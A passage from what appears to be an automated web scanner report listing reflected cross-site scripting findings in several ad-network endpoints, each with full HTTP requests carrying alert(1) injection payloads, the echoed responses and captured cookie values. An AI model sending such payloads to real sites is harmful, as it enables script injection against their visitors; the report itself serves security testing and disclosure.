document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59535&type=widesky346f9"-alert(1)-"99b469e8563&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26633-9.3200914.3219971?url=' width='160' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.60. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 4fec0<script>alert(1)</script>53371e24c20 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=B087254fec0<script>alert(1)</script>53371e24c20 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=...[SNIP]...; rtc_dGQ8=...[SNIP]...; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="...[SNIP]..."

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 13:59:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 10 May 2011 13:59:33 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:32 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "B087254FEC0<SCRIPT>ALERT(1)</SCRIPT>53371E24C20" was not recognized.
*/

3.61. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cb81'-alert(1)-'b8e98f3c48c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune6cb81'-alert(1)-'b8e98f3c48c/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:40 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:40 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:40 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:40 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:40 GMT
Content-Length: 8511

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-31746490_1304949580","http://ib.adnxs.com/ptj?member=311&inv_code=cm.tribune6cb81'-alert(1)-'b8e98f3c48c&size=300x600&imp_id=cm-31746490_1304949580,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doublecli
...[SNIP]...

3.62. http://mf.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a78a8'%3balert(1)//00e601315 was submitted in the h parameter. This input was echoed as a78a8';alert(1)//00e601315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16&w=728&h=90a78a8'%3balert(1)//00e601315&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 825
Date: Mon, 09 May 2011 14:05:20 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728" HEIGHT="90a78a8';alert(1)//00e601315" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.63. http://mf.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e518d"%3balert(1)//a5aa06a04d8 was submitted in the pid parameter. This input was echoed as e518d";alert(1)//a5aa06a04d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16e518d"%3balert(1)//a5aa06a04d8&w=728&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 827
Date: Mon, 09 May 2011 14:04:58 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16e518d";alert(1)//a5aa06a04d8&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAc
...[SNIP]...

3.64. http://mf.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef2c1'%3balert(1)//7221dd363f9 was submitted in the w parameter. This input was echoed as ef2c1';alert(1)//7221dd363f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16&w=728ef2c1'%3balert(1)//7221dd363f9&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 827
Date: Mon, 09 May 2011 14:05:08 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728ef2c1';alert(1)//7221dd363f9" HEIGHT="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.65. http://odb.outbrain.com/utils/odb [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b69c3<script>alert(1)</script>e2bfb5961ba was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.initb69c3<script>alert(1)</script>e2bfb5961ba&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2=uaMqgoSgWEsyZpjyGwNcoBSjR24A8Yxx; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 14:00:58 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDlkJWlQEP7SN0="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:59 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzcjif+xs0aSMA=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 02:48:59 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:59 GMT; Path=/
Set-Cookie: recs="FV47GVeXRORHPpgXLLfd98jd++c7SuJ1jsmR0F2fogHZ8/NhA+/K2Td+Ksz08zkobEEsJhOBOBs="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 14:05:59 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:58 GMT
Content-Length: 4052

GEL.thepage.pageinfo.outbrain.initb69c3<script>alert(1)</script>e2bfb5961ba({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204042585','req_id':'1c635d46d8c496585f548332cbeac0c0'},'score':{'preferred':'average','personal':{'score'
...[SNIP]...

3.66. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /124044/2cda0cc53888bd4bde08b06faa4b2d81

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 957ed<script>alert(1)</script>ba18c99c1cd was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /124044/2cda0cc53888bd4bde08b06faa4b2d81?callback=BF_PARTNER.gate_response957ed<script>alert(1)</script>ba18c99c1cd&cb=3766 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 70
Cache-Control: max-age=3582
Expires: Mon, 09 May 2011 15:06:42 GMT
Date: Mon, 09 May 2011 14:07:00 GMT
Connection: close

BF_PARTNER.gate_response957ed<script>alert(1)</script>ba18c99c1cd(0);

3.67. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fab5a"><script>alert(1)</script>ac6ea673d6b was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=fab5a"><script>alert(1)</script>ac6ea673d6b&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoN